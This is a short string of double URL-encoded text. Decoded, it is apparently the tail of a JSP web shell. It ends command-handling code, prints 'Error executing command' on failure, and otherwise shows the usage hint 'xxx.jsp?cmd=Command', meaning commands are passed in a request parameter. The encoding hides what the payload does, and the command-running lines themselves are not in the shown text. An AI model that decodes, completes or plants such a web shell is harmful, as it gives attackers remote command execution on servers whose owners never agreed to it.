25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%36%39%25%36%65%25%32%65%25%36%33%25%36%63%25%36%66%25%37%33%25%36%35%25%32%38%25%32%39%25%33%62%25%30%64%25%30%61%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%37%64%25%32%30%25%36%33%25%36%31%25%37%34%25%36%33%25%36%38%25%32%30%25%32%38%25%34%35%25%37%38%25%36%33%25%36%35%25%37%30%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%35%25%32%39%25%32%30%25%37%62%25%30%64%25%30%61%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%36%66%25%37%35%25%37%34%25%32%65%25%37%30%25%37%32%25%36%39%25%36%65%25%37%34%25%32%38%25%32%32%25%34%35%25%37%32%25%37%32%25%36%66%25%37%32%25%32%30%25%36%35%25%37%38%25%36%35%25%36%33%25%37%35%25%37%34%25%36%39%25%36%65%25%36%37%25%32%30%25%36%33%25%36%66%25%36%64%25%36%64%25%36%31%25%36%65%25%36%34%25%33%61%25%32%30%25%32%32%25%32%30%25%32%62%25%32%30%25%36%35%25%32%65%25%36%37%25%36%35%25%37%34%25%34%64%25%36%35%25%37%33%25%37%33%25%36%31%25%36%37%25%36%35%25%32%38%25%32%39%25%32%39%25%33%62%25%30%64%25%30%61%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%37%64%25%30%64%25%30%61%25%32%30%25%32%30%25%37%64%25%32%30%25%36%35%25%36%63%25%37%33%25%36%35%25%32%30%25%37%62%25%30%64%25%30%61%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%36%66%25%37%35%25%37%34%25%32%65%25%37%30%25%37%32%25%36%39%25%36%65%25%37%34%25%32%38%25%32%32%25%36%36%25%36%66%25%37%32%25%36%64%25%36%31%25%37%34%25%33%61%25%32%30%25%37%38%25%37%38%25%37%38%25%32%65%25%36%61%25%37%33%25%37%30%25%33%66%25%36%33%25%36%64%25%36%34%25%33%64%25%34%33%25%36%66%25%36%64%25%36%64%25%36%31%25%36%65%25%36%34%25%32%32%25%32%39%25%33%62%25%30%64%25%30%61%25%32%30%25%32%30%25%37%64%25%30%64%25%30%61%25%32%35%25%33%65